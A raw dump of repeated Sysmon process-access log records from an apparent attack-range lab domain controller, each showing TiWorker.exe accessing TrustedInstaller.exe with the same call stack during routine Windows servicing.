10341000x80000000000000005939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.200{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.184{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.169{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.169{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.169{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.153{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.153{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.153{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.153{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.153{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.138{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.138{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.138{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.138{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.138{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.122{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.122{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.122{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\nt